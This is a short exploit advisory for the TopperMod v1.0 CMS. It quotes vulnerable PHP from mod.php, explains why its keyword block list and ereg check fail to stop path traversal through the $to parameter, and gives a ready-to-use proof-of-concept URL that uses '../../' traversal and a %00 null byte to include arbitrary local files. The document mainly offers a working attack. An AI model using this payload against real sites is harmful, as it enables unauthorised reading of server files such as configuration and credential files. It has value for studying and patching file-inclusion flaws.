# Author:  __GiReX__
# mySite:  girex.altervista.org

# CMS:     TopperMod v1.0
# Site:    rtcw.ch/mio/index.php

# Bug:     Local File Inclusion
# File:   mod.php
# Var :    $to


# Bug explanation - Vuln Code:

  if (isset($_GET['mod'])) { $mod = stripslashes($_GET['mod']); } else { header("location index.php"); Die(); }
  if (isset($_GET['to'])) { $to = stripslashes($_GET['to']); } else { $to="index"; }

# Our bugged vars are GET's var so we don't need Register_Globals turned On
 
 
  $vietate=array("http","select","union","where","delete","insert","alert","document");
    if (ereg($vietate,strtolower($mod)) OR ereg($vietate,strtolower($to)) ) { 
       echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
    } elseif (ereg("[a-zA-Z0-9]",$mod) OR ereg("[a-zA-Z0-9]",$to)) {

# Our exploitation don't use a $vietate word and
# the check of ereg() return true if we use some letters


  ...
# ... we must be logged in and $mod must be a real section
  ...


  if (file_exists("mod/$mod/".$to.".php") ) {
    include("mod/$mod/".$to.".php");
  } else {
    echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
        }

# var $to is not sanizated so we can exploit thought Local File Inclusion


PoC:  [host]/[path]/mod.php?mod=account&to=../../[local file]%00